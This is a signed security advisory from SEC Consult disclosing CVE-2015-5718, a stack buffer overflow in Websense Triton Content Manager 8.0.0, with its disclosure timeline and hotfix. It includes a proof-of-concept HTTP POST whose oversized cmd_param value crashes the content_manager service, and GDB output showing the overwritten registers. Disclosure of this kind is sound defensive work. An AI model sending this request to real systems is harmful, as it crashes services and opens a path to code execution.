Websense Triton Content Manager 8.0.0 Build 1165 Buffer Overflow
Posted on 09 August 2015
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory < 20150805-0 > ======================================================================= title: Stack buffer overflow in handle_debug_network product: Websense Triton Content Manager vulnerable version: 8.0.0 build 1165 fixed version: V8.0.0 HF02 CVE number: CVE-2015-5718 impact: high homepage: www.websense.com found: 2015-04-13 by: C. Schwarz (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: - ------------------- Websense Content Gateway (Content Gateway) is a Linux-based, high-performance Web proxy and cache that provides real-time content scanning and Web site classification to protect network computers from malicious Web content while controlling employee access to dynamic, user-generated Web 2.0 content. Web content has evolved from a static information source to a sophisticated platform for 2-way communications, which can be a valuable productivity tool when adequately secured. URL: http://www.websense.com/content/support/library/deployctr/v76/dic_wcg.aspx Business recommendation: - ------------------------ Attackers are able to completely compromise the Websense Content Manager with combined targeted attack vectors. The scope of the test, where the vulnerabilities have been identified, was a very short crash-test of the application. It is assumed that further vulnerabilities exist within this product. Vulnerability overview/description: - ----------------------------------- A stack-based buffer overflow was identified in the Websense Content Manager administrative interface, which allows to write past the 512 bytes sized buffer "dest" when calling "strcpy" in "handle_debug_network". The vulnerability can be used in combination with a CSRF attack to crash the system or execute arbitrary code. Proof of concept: - ----------------- A single HTTP request is sufficient to crash the content_manager binary application: POST /submit_net_debug.cgi?mode=0&menu=0&item=4&tab=1 HTTP/1.1 Host: <content gateway>:8081 [...] Content-Length: 869 record_version=10479%3A70&submit_from_page=%2Fmonitor%2Fm_net_debug.ink&cmd_name=1&cmd_param=[Ax2048]&cmd_status=0&troute_install=0&tdump_install=0&cmd_action=1&cate=ping&cate=asd&apply=apply Below is the GDB output of the process memory, most of the CPU's registers including the stack pointer of various previous frames are overwritten with the value of 'A'. Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7f122b073700 (LWP 50174)] 0x00000000006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized out>, arg=<value optimized out>) at /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997 997 /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc: No such file or directory. in /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc (gdb) i r rax 0x0 0 rbx 0x4141414141414141 4702111234474983745 rcx 0x125c0 75200 rdx 0xda3f 55871 rsi 0x3541360 55841632 rdi 0x1 1 rbp 0x4141414141414141 0x4141414141414141 rsp 0x7f122b070618 0x7f122b070618 r8 0x4141414141414141 4702111234474983745 r9 0x4141414141414141 4702111234474983745 r10 0x4141414141414141 4702111234474983745 r11 0x3f2c35a350 271324652368 r12 0x4141414141414141 4702111234474983745 r13 0x4141414141414141 4702111234474983745 r14 0x4141414141414141 4702111234474983745 r15 0x4141414141414141 4702111234474983745 rip 0x6becb1 0x6becb1 <handle_debug_network(WebHttpContext*, char const*, char*)+561> eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) bt #0 0x00000000006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized out>, arg=<value optimized out>) at /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997 #1 0x4141414141414141 in ?? () #2 0x4141414141414141 in ?? () #3 0x4141414141414141 in ?? () #4 0x4141414141414141 in ?? () #5 0x4141414141414141 in ?? () #6 0x4141414141414141 in ?? () #7 0x4141414141414141 in ?? () #8 0x4141414141414141 in ?? () #9 0x4141414141414141 in ?? () #10 0x4141414141414141 in ?? () #11 0x4141414141414141 in ?? () #12 0x4141414141414141 in ?? () #13 0x4141414141414141 in ?? () #14 0x4141414141414141 in ?? () #15 0x4141414141414141 in ?? () #16 0x4141414141414141 in ?? () #17 0x0000000000000000 in ?? () (gdb) Vulnerable / tested versions: - ----------------------------- Websense Triton Content Manager 8.0.0 build 1165 Vendor contact timeline: - ------------------------ 2015-05-18: Contacting vendor 2015-06-02: established secure communication channel 2015-06-03: sending advisory draft 2015-06-24: requesting update from vendor 2015-07-16: requesting update from vendor 2015-07-20: requesting update from vendor 2015-07-24: Websense states that hotfix V8.0.0 HF02 was released on 2015-06-10 2015-08-05: Public advisory release Solution: - --------- The vulnerability has beed fixed in hotfix V8.0.0 HF02. http://www.websense.com/support/article/kbarticle/v8-0-0-About-Hotfix-02-for-Websense-Content-Gateway Workaround: - ----------- No workaround available. Advisory URL: - ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Christoph Schwarz / @2015 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) iQIcBAEBAgAGBQJVwedZAAoJEC0t17XG7og/fioP/2G7YOKdO6fBaT2GQdYaZvTO V/o+Ticavuc/eyBIUx+la9YPl0lC4ty5kJzh2E8P3Xpucqq5vMB/nQg1V9cmTsr2 hRGKX7n3XdJXjiWMk6i+0XIjIlYBCHKT+Q05rEUnmZzCfvB6iu5J3WYlyW7QH3Bu ME/WhlsG5fBTiDjjOiuFeZB1rsaZxqNGtspwRwnrXH3HZyze74S8x7ZWG68q2v9a eBUndHye9DGzwHtY5QmmqUJeTq4tX6bNb8KYMoZC/0FNNhUglkRKyQVVY5uuLJya 4ZAvtuKZCDLGap4ZSQSweZ7h9zY3vaiYfyHijqfZ6qkbWbiZSv5WyomdVF4xrZzT n00yBtGF2kmxDmvUYj5IZGrDKlRui1lpgtPXCuVstuYOC6/R4ZiJy+pL0MMc9C7M tnOKM9yl3PuZRqIPoXPzn3NOKlHWzZHgmNdaOJSxt9/slEZb69De7FwXV/GfbYsS hax0PF29a5NlssxQep5GH1zNTRXmoUtsnECwYnMm309M8ulM1xtNeMZbo2D66zY8 v16L0DlKLh86fmdW5G3em7YHUMrV3PCj605BLsi4rmNDfPJpNIgj+Vq1M94OcNJW DtJk0hQlfRI+BtScIpLmMHCqHc6vNsVZKbVwbev3QYq3ACNEguALS1UQ21AbUIBE OidnDK17YDsYh6mkkvc2 =FaSJ -----END PGP SIGNATURE-----
